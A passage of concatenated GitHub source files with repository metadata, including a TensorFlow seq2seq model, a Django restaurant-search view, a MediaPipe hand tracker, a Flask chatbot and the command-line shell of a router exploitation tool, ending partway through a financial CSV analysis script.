dtype=dtype)\n output_projection = (w, b)\n\n def sampled_loss(inputs, labels):\n labels = tf.reshape(labels, [-1, 1])\n local_w_t = tf.cast(w_t, tf.float32)\n local_b = tf.cast(b, tf.float32)\n local_inputs = tf.cast(inputs, tf.float32)\n return tf.cast(\n tf.nn.sampled_softmax_loss(local_w_t, local_b,\n local_inputs, labels,\n num_samples, self.target_vocab_size),\n dtype)\n softmax_loss_function = sampled_loss\n\n # Define cells for encoder and decoder.\n encoder_cell = tf.nn.rnn_cell.BasicLSTMCell(size)\n decoder_cell = tf.nn.rnn_cell.BasicLSTMCell(size)\n if use_dropout:\n encoder_cell = tf.nn.rnn_cell.DropoutWrapper(\n encoder_cell, output_keep_prob=0.5, input_keep_prob=0.5)\n decoder_cell = tf.nn.rnn_cell.DropoutWrapper(\n decoder_cell, output_keep_prob=0.5, input_keep_prob=0.5)\n if num_layers > 1:\n encoder_cell = tf.nn.rnn_cell.MultiRNNCell([encoder_cell] * num_layers)\n decoder_cell = tf.nn.rnn_cell.MultiRNNCell([decoder_cell] * num_layers)\n\n # Feeds for inputs.\n self.encoder_inputs = []\n self.decoder_inputs = []\n self.target_weights = []\n self.list_of_mask = []\n for i in xrange(self.encoder_length):\n self.encoder_inputs.append(tf.placeholder(\n tf.int32,\n shape=[self.batch_size],\n name=\"encoder{0}\".format(i)))\n\n for i in xrange(self.decoder_length + 1): # Include the Go symbol.\n # decoder_inputs = [Go, w_1, w_2, ..., w_n, EOS]\n self.decoder_inputs.append(tf.placeholder(\n tf.int32,\n shape=[self.batch_size],\n name=\"decoder{0}\".format(i)))\n self.target_weights.append(tf.placeholder(\n dtype,\n shape=[self.batch_size],\n name=\"weight{0}\".format(i)))\n self.list_of_mask.append(tf.placeholder(\n tf.int32,\n shape=[self.batch_size],\n name=\"mask{0}\".format(i)))\n\n # Sequence length for dynamic rnn.\n self.encoder_input_length = tf.placeholder(\n tf.int32,\n shape=[self.batch_size],\n name=\"encoder_input_length\")\n\n # Targets are decoder inputs shifted by one.\n # targets = [w_1, w_2, ..., w_n, EOS]\n targets = [self.decoder_inputs[i + 1]\n for i in xrange(len(self.decoder_inputs) - 1)]\n\n self.outputs, self.loss, self.beams = seq2seq.model(\n self.encoder_inputs[:self.encoder_length],\n self.decoder_inputs[:self.decoder_length],\n targets[:self.decoder_length],\n self.target_weights[:self.decoder_length],\n self.encoder_input_length,\n self.list_of_mask[:self.decoder_length],\n encoder_cell,\n decoder_cell,\n num_encoder_symbols=self.source_vocab_size,\n num_decoder_symbols=self.target_vocab_size,\n embedding_size=size,\n beam_size=beam_size,\n output_projection=output_projection,\n softmax_loss_function=softmax_loss_function,\n dtype=dtype)\n\n if output_projection is not None:\n self.projected_outputs = [\n tf.matmul(output, output_projection[0]) + output_projection[1]\n for output in self.outputs]\n else:\n self.projected_outputs = self.outputs\n\n if not do_decode:\n # Optimization for training the model.\n params = tf.trainable_variables()\n if use_adam_opt:\n opt = tf.train.AdamOptimizer()\n else:\n opt = tf.train.GradientDescentOptimizer(self.learning_rate)\n gradients = tf.gradients(self.loss, params)\n clipped_gradients, self.gradient_norm = tf.clip_by_global_norm(gradients,\n max_gradient_norm)\n self.updates = opt.apply_gradients(zip(clipped_gradients, params),\n global_step=self.global_step)\n\n self.saver = tf.train.Saver(tf.global_variables())\n\n\n def step(self, session, encoder_inputs, decoder_inputs, target_weights,\n encoder_input_length, list_of_mask, batch_size, do_decode=False):\n if len(encoder_inputs) != self.encoder_length:\n 
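Shapes behind the output projection wired up above, with toy sizes: the decoder emits size-dimensional vectors, and proj_w/proj_b lift them to vocabulary logits exactly as the tf.matmul(output, output_projection[0]) + output_projection[1] lines do (numbers below are illustrative only):

import numpy as np

size, vocab, batch = 4, 10, 2
output = np.random.randn(batch, size)   # one decoder output per example
w = np.random.randn(size, vocab)        # proj_w
b = np.zeros(vocab)                     # proj_b
logits = output @ w + b
print(logits.shape)                     # (2, 10)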
raise ValueError(\"Encoder length must be equal to the one in bucket,\"\n \" %d != %d.\" % (len(encoder_inputs), self.encoder_length))\n if len(decoder_inputs) != self.decoder_length:\n raise ValueError(\"Decoder length must be equal to the one in bucket,\"\n \" %d != %d.\" % (len(decoder_inputs), self.decoder_length))\n if len(target_weights) != self.decoder_length:\n raise ValueError(\"Weights length must be equal to the one in bucket,\"\n \" %d != %d.\" % (len(target_weights), self.decoder_length))\n\n input_feed = {}\n for l in xrange(self.encoder_length):\n input_feed[self.encoder_inputs[l].name] = encoder_inputs[l]\n for l in xrange(self.decoder_length):\n input_feed[self.decoder_inputs[l].name] = decoder_inputs[l]\n input_feed[self.target_weights[l].name] = target_weights[l]\n input_feed[self.list_of_mask[l].name] = list_of_mask[l]\n\n # Since targets are decoder inputs shifted by one, we need one more.\n last_target = self.decoder_inputs[self.decoder_length].name\n input_feed[last_target] = np.zeros([batch_size], dtype=np.int32)\n\n input_feed[self.encoder_input_length.name] = encoder_input_length\n\n if not do_decode:\n output_feed = [self.updates,\n self.gradient_norm,\n self.loss]\n else:\n if self.beam_size > 1:\n output_feed = self.beams\n else:\n output_feed = [self.loss]\n for l in xrange(self.decoder_length):\n output_feed.append(self.projected_outputs[l])\n\n outputs = session.run(output_feed, input_feed)\n if not do_decode:\n return outputs[1], outputs[2], None\n else:\n if self.beam_size > 1:\n return None, None, outputs\n return None, outputs[0], outputs[1:]\n\n\n def get_batch(self, data_set, feed_previous_rate=1, pos=-1):\n encoder_inputs, decoder_inputs = [], []\n encoder_input_length = []\n references = []\n\n for i in xrange(0, 64): # self.batch_size + 1):\n if pos is None:\n # random samples.\n encoder_input, decoder_input, pair_id = random.choice(data_set)\n else:\n pos += 1\n if pos != 0 and pos % len(data_set) == 0:\n random.shuffle(data_set)\n break\n encoder_input, decoder_input, pair_id = data_set[pos%len(data_set)]\n\n\n # Check if Unknown tokens are in the input\n has_ukn = True if data_utils.UNK_ID in encoder_input else False\n\n # Encoder inputs are padded.\n encoder_pad = [data_utils.PAD_ID] * (self.encoder_length - len(encoder_input))\n encoder_inputs.append(list(encoder_input + encoder_pad))\n\n # Record the meaningful encoder input length.\n encoder_input_length.append(len(encoder_input))\n\n # Decoder inputs get a starting symbol \"GO\", and are padded.\n decoder_pad = [data_utils.PAD_ID] * (self.decoder_length - len(decoder_input) - 1)\n decoder_inputs.append([data_utils.GO_ID] + decoder_input + decoder_pad)\n\n # Save references for evaluation.\n references.append([pair_id, decoder_input, has_ukn])\n\n encoder_input_length = np.array(encoder_input_length, dtype=np.int32)\n\n # batch_size is not necessarily equal to self.batch_size.\n batch_size = len(encoder_inputs)\n\n # Create the list of masks.\n list_of_mask = []\n full_matrix = np.full((batch_size), int(feed_previous_rate * 100))\n for length_idx in xrange(self.decoder_length):\n mask = np.greater(full_matrix,\n np.random.randint(100, size=(batch_size))).astype(np.float32)\n list_of_mask.append(mask)\n\n\n # Now create time-major vectors from the data seleted above.\n batch_encoder_inputs, batch_decoder_inputs, batch_weights = [], [], []\n\n for length_idx in xrange(self.encoder_length):\n batch_encoder_inputs.append(\n np.array([encoder_inputs[batch_idx][length_idx]\n for batch_idx in 
xrange(batch_size)], dtype=np.int32))\n\n for length_idx in xrange(self.decoder_length):\n batch_decoder_inputs.append(\n np.array([decoder_inputs[batch_idx][length_idx]\n for batch_idx in xrange(batch_size)], dtype=np.int32))\n # Create target_weights to be 0 for targets that are padding.\n batch_weight = np.ones(batch_size, dtype=np.float32)\n for batch_idx in xrange(batch_size):\n if length_idx < self.decoder_length - 1:\n target = decoder_inputs[batch_idx][length_idx + 1]\n if length_idx == self.decoder_length - 1 or target == data_utils.PAD_ID:\n batch_weight[batch_idx] = 0.0\n batch_weights.append(batch_weight)\n\n\n\n return (batch_encoder_inputs, batch_decoder_inputs, batch_weights,\n encoder_input_length, list_of_mask, batch_size, references,\n pos)\n\n","repo_name":"sheng-z/cross-lingual-open-ie","sub_path":"mt_ie/seq2seq_model.py","file_name":"seq2seq_model.py","file_ext":"py","file_size_in_byte":12793,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"21"} +{"seq_id":"4164437730","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pathlib\nimport os\nimport utility as ut\nimport sys\n\n\n\n\ndef hbonds(filename, show = False, min_frame = 0, max_frame = 8001):\n x = []\n y = []\n with open(filename) as f:\n for line in f:\n if line[0] != '#' and line[0] != '@':\n cols = line.split()\n if len(cols) == 2 and float(cols[0]) >= min_frame and float(cols[0]) <= max_frame:\n x.append(float(cols[0]))\n y.append(float(cols[1]))\n name = filename.split('/')[-1].split('.')[0]\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.set_xlim(min_frame, max_frame)\n ax1.set_title(name)\n ax1.set_xlabel(\"Time (ns)\")\n ax1.set_ylabel(\"Hydrogen bonds\")\n ax1.plot(x,y, c=\"b\")\n print(np.arange(min_frame, max_frame, 1000))\n ax1.set_xticks(np.arange(min_frame, max_frame, 1000))\n ax1.set_xticklabels(np.arange(min_frame / 20, max_frame/20, 50))\n leg = ax1.legend()\n ut.show_or_save(name + '.png', show)\n\n\namino_acid_pair = sys.argv[1]\nligand_amino_acids = sys.argv[2]\n\nhbonds(amino_acid_pair)\nhbonds(ligand_amino_acids, min_frame = 4500, max_frame = 7000)\n","repo_name":"giacThePhantom/computational-biophysics-project","sub_path":"data-analysis/plot_hbonds.py","file_name":"plot_hbonds.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41300673205","text":"\nimport json\nimport os\n\nfrom django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.views.generic import FormView, CreateView\nimport requests\nfrom dotenv import load_dotenv\nfrom django.urls import reverse_lazy, reverse\nfrom urllib.parse import urlencode\nimport logging\nimport inspect\nimport pprint\n\nfrom .models import SearchModel\nfrom .forms import SearchForm\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\ndotenv_path = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), '.env')\nload_dotenv(dotenv_path)\n\n\ngurume_search_api_key = os.environ['RECURIT_API_KEY']\ngurume_search_url = 'http://webservice.recruit.co.jp/hotpepper/gourmet/v1/'\n\narea_data = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'area.csv')\narea_items = []\nwith open(area_data, 'r') as r:\n r = r.read() \n t = r.split('\\n')\n for i in t:\n area_items.append(tuple(i.split(',')))\n\n\ndef map_func(request):\n if request.method == 'POST':\n lat, lng = 
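The tick relabelling in plot_hbonds divides frame numbers by 20 (ticks every 1000 frames, labelled in steps of 50), i.e. 20 frames per nanosecond. The mapping spelt out:

import numpy as np

frames = np.arange(0, 8001, 1000)
for f in frames:
    print(f"frame {f:5d} -> {f / 20:6.1f} ns")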
request.POST['current'].replace(' ', '').replace('\\r', '').replace('\\n', ',').split(',')\n \n info = {\n 'key': gurume_search_api_key,\n 'range': request.POST['area'],\n 'lat': lat,\n 'lng': lng,\n 'format': 'json',\n 'count': 100,\n 'genre': request.POST['genre'],\n }\n print(info)\n responce = requests.get(gurume_search_url, info)\n responce_json = responce.json()\n json_data = responce_json['results']['shop']\n if json_data:\n shop_data = []\n for i in json_data:\n shop_data.append({\n 'name': i['name'],\n 'lat': i['lat'],\n 'lng': i['lng'],\n 'access': i['access'],\n 'address': i['address'],\n 'photo': i['photo']['pc']['l'],\n 'urls': i['urls']['pc'],\n })\n else:\n redirect_url = reverse('search')\n parameter = urlencode({\n 'data_is_none': '店舗が存在しません'\n })\n url = f'{redirect_url}?{parameter}'\n return redirect(url)\n \n return render(request, 'map.html', {'shop_data': shop_data, 'center_lat': lat, 'center_lng': lng})\n\ndef search_func(request):\n form = SearchForm()\n if 'data_is_none' in request.GET:\n return render(request, 'search.html', {\n 'form': form,\n 'data_is_none': request.GET['data_is_none'],\n })\n logging.info(request)\n return render(request, 'search.html', {'form': form})\n \n \n\n \n \n","repo_name":"toguchi-taichi/Restaurant_search","sub_path":"searchapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23295707143","text":"string = '\"alpha\",\"beta\",\"gamma\",\"delta\"\\n1,2,3,4\\n5.0,6.0,7.0,8.0'\nsplit_strings = [x.split(',') for x in string.split('\\n')]\nstring_arr = []\nfor string_part in split_strings :\n fixed_string_part = []\n for element in string_part :\n if '\"' in element :\n fixed_element = element[1:-1]\n elif '.' 
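The empty-result branch above round-trips a human-readable message through the query string; the encoding step in isolation (the literal path is assumed — reverse('search') resolves it in the real view):

from urllib.parse import urlencode, parse_qs

params = urlencode({"data_is_none": "店舗が存在しません"})
url = f"/search/?{params}"             # message is percent-encoded as UTF-8
print(url)
print(parse_qs(url.split("?", 1)[1]))  # request.GET performs this decoding server-side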
in element :\n fixed_element = float(element)\n else:\n fixed_element = int(element)\n fixed_string_part.append(fixed_element)\n string_arr.append(fixed_string_part)\nprint(string_arr)\n","repo_name":"snowthesprite/assignment-problems","sub_path":"Assigns/Assignment_47/refactor_string_processing.py","file_name":"refactor_string_processing.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29271962120","text":"from setuptools import setup\n\ninstall_requires = [\n 'google-api-python-client==1.6.3',\n]\n\ntest_requires = [\n]\n\nsetup(\n name='pydataproc',\n version='0.7.1',\n author='Oli Hall',\n author_email='',\n description=\"Python wrapper for the Google DataProc client\",\n license='MIT',\n url='https://github.com/oli-hall/py-dataproc',\n packages=['pydataproc'],\n setup_requires=[],\n install_requires=install_requires,\n tests_require=test_requires,\n)\n","repo_name":"oli-hall/py-dataproc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13016980917","text":"import http\nimport io\nimport json\nimport pathlib\nimport re\nfrom unittest import mock\n\nimport requests\n\nfrom twitter_aggregator.api import ApiConfig\nfrom twitter_aggregator.cli import CliConfig\nfrom twitter_aggregator.main import Config, configure_cli\n\n\nclass FakeSession(requests.Session):\n def get(self, url: str, **kwargs) -> requests.Response: # type: ignore[override]\n response = mock.MagicMock(\n status_code=http.HTTPStatus.OK, spec=requests.Response\n )\n if \"/2/users/by?usernames\" in url:\n raw_data = pathlib.Path(\n \"twitter_aggregator/testdata/get_users.json\"\n ).read_text()\n data = json.loads(raw_data)\n response.json.return_value = data\n elif \"/2/users/\" in url:\n raw_data = pathlib.Path(\n \"twitter_aggregator/testdata/get_tweets.json\"\n ).read_text()\n data = json.loads(raw_data)\n response.json.return_value = data\n elif \"/2/tweets/\" in url:\n match = re.compile(r\"/2/tweets/(\\d+)\").search(url)\n assert match is not None\n\n id = match[1]\n raw_data = pathlib.Path(\n f\"twitter_aggregator/testdata/get_tweet_{id}.json\"\n ).read_text()\n data = json.loads(raw_data)\n response.json.return_value = data\n else:\n raise ValueError(\"Unexpected url: %s\" % url)\n\n return response\n\n\ndef test_calculates_stats():\n # Arrange.\n buffer = io.StringIO()\n config = Config(\n api=ApiConfig(base_path=\"\", bearer_token=\"\"),\n cli=CliConfig(\n debug=False,\n queried_profile_name=\"Google\",\n most_common_count=10,\n max_results=100,\n ),\n )\n cli = configure_cli(config, buffer, session=FakeSession())\n\n # Act.\n cli.run()\n\n # Assert.\n output = buffer.getvalue()\n assert \"hashtags_count=3\" in output\n assert \"mentions_count=55\" in output\n assert (\n \"most_common_hashtags=[('GABI', 1), ('NextBillionUsers', 1), ('Pixel6', 1)]\"\n in output\n )\n assert (\n \"most_common_mentions=[('Google', 3), ('gmail', 2), ('SwaveDigest', 1),\"\n in output\n )\n","repo_name":"piotrszyma/twitter-aggregator","sub_path":"twitter_aggregator/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32509124258","text":"import cv2\nimport mediapipe as mp\nimport time\nimport 
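The refactored string processing above re-implements a small CSV dialect by hand; Python's csv module handles the quoting, leaving only the same '.'-means-float coercion heuristic:

import csv
import io

raw = '"alpha","beta","gamma","delta"\n1,2,3,4\n5.0,6.0,7.0,8.0'

def coerce(tok):
    try:
        return float(tok) if "." in tok else int(tok)
    except ValueError:
        return tok            # quoted fields arrive unquoted and stay strings

rows = [[coerce(tok) for tok in row] for row in csv.reader(io.StringIO(raw))]
print(rows)   # [['alpha', 'beta', 'gamma', 'delta'], [1, 2, 3, 4], [5.0, 6.0, 7.0, 8.0]]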
serial\n\narduino=serial.Serial(\"/dev/cu.usbmodem143301\",9600)\n#ensure that the port matches arduino\n#second argument is setting baud rate\n\nprint(arduino.name)\n\n\nclass handDetector():\n def __init__(self,mode=False,maxHands=3,detectionCon=0.5,trackCon=0.5):\n self.mode=mode\n self.maxHands=maxHands\n self.detectionCon=detectionCon\n self.trackCon=trackCon\n #variable\n #general parameters of the hands class. see the documations of Hands\n self.mpHands = mp.solutions.hands # taking the hands model from the google mediapipe\n self.hands = self.mpHands.Hands(self.mode,self.maxHands,self.detectionCon,self.trackCon) # write parameters inside the brackets\n # write nothing because using the default parameters (see what those are)\n self.mpDraw = mp.solutions.drawing_utils\n # provided that draws points on your hand\n #^ just initializing the class\n\n def findHands(self,img,draw=True):\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n self.results = self.hands.process(imgRGB)\n\n if self.results.multi_hand_landmarks: # if multiple hands are detected\n for handLms in self.results.multi_hand_landmarks:\n if draw:\n #only draw if true\n self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS) # wont draw on RGB\n # extract information from each hand\n return img\n\n def findPosition(self,img,handNo=0,draw=True):\n\n lmList=[]\n if self.results.multi_hand_landmarks:\n myHand=self.results.multi_hand_landmarks[handNo]\n\n for id, lm in enumerate(myHand.landmark):\n # gets info from each hand\n # each hand has numbered landmarks and its x,y,z coodinates are printed\n # for example the tip of your thumb has a landmark and so on\n # print(id,lm)\n h, w, c = img.shape\n cx, cy = int(lm.x * w), int(lm.y * h)\n # position of the centre landmark x*w landmark y*h\n # height width and channel\n\n lmList.append([id,cx,cy])\n # basically gives the x and y coordinates of each landmark\n # will print for all 20 landmarks\n # therefore print id as well\n # then you can use certain IDs for certain tasks\n if draw:\n cv2.circle(img, (cx, cy), 8, (255, 0, 0), cv2.FILLED)\n return lmList\n\n\n\n\n\n #dummy code to showcase what the module can do\n #basically you can copy the code below to run in a different project\ndef main():\n\n pTime = 0 # previous time\n cTime = 0 # current time\n # used to track the FPS\n cap = cv2.VideoCapture(0)\n detector=handDetector() #default parameters already set\n\n while True:\n success, img = cap.read()\n img=detector.findHands(img,draw=False)\n lmList=detector.findPosition(img,draw=False)\n #find position method returns a list of hand positions\n if len(lmList) !=0:\n print(lmList[8])\n x='X'+str((lmList[8][1]))\n y='Y'+str((lmList[8][2]))\n print(x)\n print(y)\n arduino.write(bytes(x, 'utf-8'))\n arduino.write(bytes(y, 'utf-8'))\n #index 1 is x\n #index 2 is y\n #where land mark 4 is the tip of the thumb\n # 8 is the finger tip\n\n\n # for calculating fps\n cTime = time.time()\n fps = 1 / (cTime - pTime)\n pTime = cTime # previoustime becomes current time\n img = detector.findHands(img)\n cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_SIMPLEX, 3,\n (255, 0, 255), 3)\n # prints text on the image instead of the console\n # need to convert fps to a string and also round it\n # the rest is just the font, scale colour and thickness\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n\n\nif __name__==\"__main__\":\n 
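In the hand-tracking loop above, coordinates are framed only by their 'X'/'Y' prefixes, so the Arduino side has to detect each value's end from the next letter. One common alternative is newline-terminated frames (protocol assumed — the receiving sketch would then split on the newline):

def frame_coords(x, y):
    # hypothetical framing; the original sends bytes('X412') then bytes('Y233')
    return f"X{x}\nY{y}\n".encode("utf-8")

print(frame_coords(412, 233))   # b'X412\nY233\n'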
main()","repo_name":"conordrayton/fingerTrack","sub_path":"hand_tracking/HandTrackingModule2.py","file_name":"HandTrackingModule2.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39218559920","text":"import os\n\nfrom flask import Flask, render_template, request, jsonify\nfrom flask_cors import CORS\nfrom flask_socketio import SocketIO, emit\n\nfrom chatbot import get_response\n\napp = Flask(__name__)\nCORS(app)\n# app.config['SECRET_KEY'] = 'secret!'\n# socketio = SocketIO(app)\n\n\n@app.route(\"/\", methods=['GET'])\ndef index():\n return render_template(\"base.html\")\n\n\n@app.route(\"/predict\", methods=['POST'])\ndef predict():\n text = request.get_json().get(\"message\")\n response = get_response(text)\n message = {'answer': response}\n return jsonify(message)\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n # socketio.run(app, port=int(os.environ.get('PORT', '5000')))\n","repo_name":"ameermustafa/codefest21","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4412303071","text":"from card_group import CardGroup\nfrom pyglet.shapes import Rectangle\nimport pyglet\n\n#看了一下可能只能这么调用了\n# class Parent: # 定义父类\n# def myMethod(self):\n# print('调用父类方法')\n\n# class Child(Parent): # 定义子类\n# def myMethod(self):\n# super().myMethod()\n# print('调用子类方法')\n\n# c = Child() # 子类实例\n# c.myMethod() # 子类调用重写方法\n\n#声明成全局的,每个新的card的实例也就只是持有一个这货的指针就可以了\nsweep_sound_g = pyglet.media.load('sound/mixkit-explainer-video-game-alert-sweep-236.wav')\n\n#https://pyglet.readthedocs.io/en/latest/modules/shapes.html\n#Card对象,直接继承于Rectangle类\n#id,type这些估计以后都需要的\nclass Card(Rectangle):\n name = \"\"\n card_group = None\n batch = None\n\n sweep_sound = sweep_sound_g\n\n \"\"\"docstring for Card_manger\"\"\"\n def __init__(self,x,y,width,height,color,batch,name):\n super().__init__(x,y,width,height,color,batch)\n self.batch = batch\n self.name = name\n\n #ui交互用的方法,检查鼠标指针是否是在本对象范围内\n def check(self,mouse_x,mouse_y):\n if (mouse_x > self.x and mouse_x < self.x+self.width) and (mouse_y > self.y and mouse_y < self.y+self.height):\n return True\n else:\n return False\n\n #低级方法,移动卡牌\n def move(self,dx,dy):\n #self.opacity=40\n #这里鼠标的x肯定是在mouse_x > self.x and mouse_x < self.x+self.width里面的\n self.x = self.x+dx\n self.y = self.y+dy\n self.draw()\n\n #我还得加上一些文字啥的\n def draw(self):\n super().draw()\n my_lbl = pyglet.text.Label(text=self.name,\n font_name='微软雅黑',\n font_size=12,\n x=self.x+6, \n y=self.y+10,\n batch=self.batch)\n my_lbl.draw()\n\n #将cardgroup的指针返回给外界\n def getCardGroup(self):\n return self.card_group\n\n #加入某个卡组\n def joinCardGroup(self,cardGroup:CardGroup):\n #加入某个卡组,处理完一系列的成功或者意外情况之后,需要一定的逻辑\n cardGroup.join(self)\n #将自己card_group指针,和外界传过来的做好链接\n self.card_group = cardGroup\n return True\n\n #退出当前的卡组\n def leaveCardGroup(self):\n #这里不需要提供参数的原因,很简单,因为自身持有了card_group指针\n if self.card_group == None:\n #对外抛出错误,你不能离开一个空的卡组\n print(\"You cannot leave a blank card group\")\n raise Exception(\"You cannot leave a blank card group\")\n else:\n #调用卡组的remove方法,把自己剔除出卡组\n self.card_group.remove(self)\n #最后一步肯定是断开指针联系\n self.card_group = None\n return True\n\n #把自己粘附到这个卡组的坐标位置上面去\n def uiAttchToGroup(self):\n #取得自己所述的卡组的指针\n myCardGroup=self.getCardGroup()\n if myCardGroup:\n #如果指针不为空,则拿到卡组的leader的指针\n 
groupLeader=myCardGroup.getCardsList()[0]\n self.x = groupLeader.x\n self.y = groupLeader.y-20\n\n###END OF CARD CLASS","repo_name":"lemonhall/card_game","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26752500113","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: 'arvin'\nimport os\n\nimport utils\nfrom exceptions import ModuleImportException\nfrom template.interpreter import BaseInterpreter\nfrom utils import Color\n\n\nclass CmdInterpreter(BaseInterpreter):\n def __init__(self):\n super(CmdInterpreter, self).__init__()\n\n self.version = '0.01'\n self.banner = \"\"\".______ ______ __ __ .___________. _______ .______ .______ ____ __ ____ .__ __.\n| _ \\ / __ \\ | | | | | || ____|| _ \\ | _ \\ \\ \\ / \\ / / | \\ | |\n| |_) | | | | | | | | | `---| |----`| |__ | |_) | | |_) | \\ \\/ \\/ / | \\| |\n| / | | | | | | | | | | | __| | / | ___/ \\ / | . ` |\n| |\\ \\----.| `--' | | `--' | | | | |____ | |\\ \\----.| | \\ /\\ / | |\\ |\n| _| `._____| \\______/ \\______/ |__| |_______|| _| `._____|| _| \\__/ \\__/ |__| \\__|\n {RouterPwn}\n author: arvin\n Email: ivytin@gmail.com\n Version: {version}\n\"\"\".format(version=self.version, RouterPwn=Color.RED + 'RouterPwn' + Color.ENDC)\n self.help_info = \"\"\"Commands:\n help Print this help menu\n use Select a modules for usage\n exec Execute a command in a shell\n exit Exit RouterSploit\"\"\"\n\n self.main_modules_dirs = [module for module in os.listdir(utils.MODULES_DIR) if not module.startswith(\"__\")]\n\n def postloop(self):\n utils.print_warning('Bye!')\n\n def cmdloop(self, intro=None):\n utils.print_info(self.banner)\n super(CmdInterpreter, self).cmdloop()\n\n def do_use(self, module_path, *arg):\n module_path = utils.pythonize_path(module_path)\n module_path = '.'.join(('modules', module_path, '__interpreter__'))\n try:\n utils.import_module(module_path, 'Interpreter')()\n except ModuleImportException as err:\n utils.print_failed(err)\n\n def complete_use(self, text, *args, **kwargs):\n return [module for module in self.main_modules_dirs if module.startswith(text)]\n\n def do_show(self, args):\n for module in self.main_modules_dirs:\n utils.print_info(module, end='\\t')\n utils.print_info('')\n\n def do_exit(self, args):\n return True\n\n def help_show(self):\n pass\n\n def help_exit(self):\n utils.print_help('Exit script')\n\n\nclass ExploitInterpreter(BaseInterpreter):\n pass\n","repo_name":"ivytin/rpwd","sub_path":"cmdui.py","file_name":"cmdui.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"9845032351","text":"import os\nimport sys\nimport re\nfrom pathlib import Path\n# Create some data structures and variables for our program\n\ndef fin_analysis(filename,summary):\n \"\"\"Given a filename and directions whether or not to create a summary file,\n return the summary data and summaryfile.txt if requested \"\"\"\n budget = {}\n profit_loss_total = 0\n profit_loss_high = []\n profit_loss_low = []\n filepath = Path(filename)\n \n with open(filepath, mode = 'r') as f:\n\n # Creates an iterable \"i\" that we will use for error references.\n i = 0\n empty_lines = []\n error_dict = {}\n error_condition = False\n # Starts the main loop:\n for line in f:\n i += 1 \n if i > 0:\n \n # Checks for a specific concantenation of 3 letters for month, 4 digits for year, a comma,\n # Then 
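do_use above delegates to utils.import_module, whose implementation is not shown; a plausible minimal sketch using importlib, matching only the visible call shape import_module(module_path, 'Interpreter')():

import importlib

def import_module(module_path, class_name):
    # module_path is the dotted path do_use builds, e.g.
    # 'modules.<some_dir>.__interpreter__' (directory name hypothetical)
    module = importlib.import_module(module_path)
    return getattr(module, class_name)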
everything after that in the line (which SHOULD only be numbers, but we'll double check later). \n budget_item_match = re.search(r'(\\w\\w\\w-\\d\\d\\d\\d),(.+)', line)\n\n # The above is simple to work with but creates one issue. In the second group (.+), we just grab everything after the comma because\n # Some numbers have a negative sign. We need to make certain that our second item is actually a number (imagine someone typed in \"n/a\" \n # or accidently entered a \"Q\" instead of \"1\").\n if budget_item_match:\n # Set a variable equal to our P/l as a string object, so that we can iterate through it real quick and make sure it fits the right format\n check_pl_data = budget_item_match.group(2)\n error_condition = False\n # Here we loop through each 'ch' character in the string check_data. If the ch is a negative sign or a digit, we pass. \n for ch in check_pl_data:\n if ch == \"-\":\n pass\n elif ch.isdigit():\n pass\n # Here we know there is an error, but there could be multiple errors on the same line\n elif error_condition == False:\n error_condition = True\n error_character = ch \n error_dict[i] = [line, error_character]\n # Now we know there are multiple errors, so we can just add them to the \"ch\" string\n else:\n error_character += ch\n error_dict[i] = [line, error_character]\n\n # Now we want to start tracking some P/L data as it's coming in:\n if profit_loss_total == 0:\n profit_loss_total = int(budget_item_match.group(2))\n profit_loss_high = [budget_item_match.group(1) ,int(budget_item_match.group(2))]\n profit_loss_low = [budget_item_match.group(1) ,int(budget_item_match.group(2))]\n new_key = 1\n budget[new_key] = (budget_item_match.group(1),int(budget_item_match.group(2)))\n elif error_condition == False:\n # At this point, I want to force our budget{} keys to be sequential regardless of how many blank lines there are:\n new_key += 1 \n budget[new_key] = (budget_item_match.group(1),int(budget_item_match.group(2)))\n profit_loss_total = profit_loss_total + int(budget_item_match.group(2))\n #Tracks the most recent high mark for monthly p/l\n if profit_loss_high[-1] <= int(budget_item_match.group(2)):\n profit_loss_high = [budget_item_match.group(1) ,int(budget_item_match.group(2))]\n #Tracks the most recent low mark for monthly p/l\n elif profit_loss_low[-1] >= int(budget_item_match.group(2)):\n profit_loss_low = [budget_item_match.group(1) ,int(budget_item_match.group(2))]\n\n # Now we're checking for a line we don't know what to do with: \n if not budget_item_match:\n # Next we skip the first row, where the header is expected.\n if i == 1:\n pass\n # Next we check for an empty line OR an 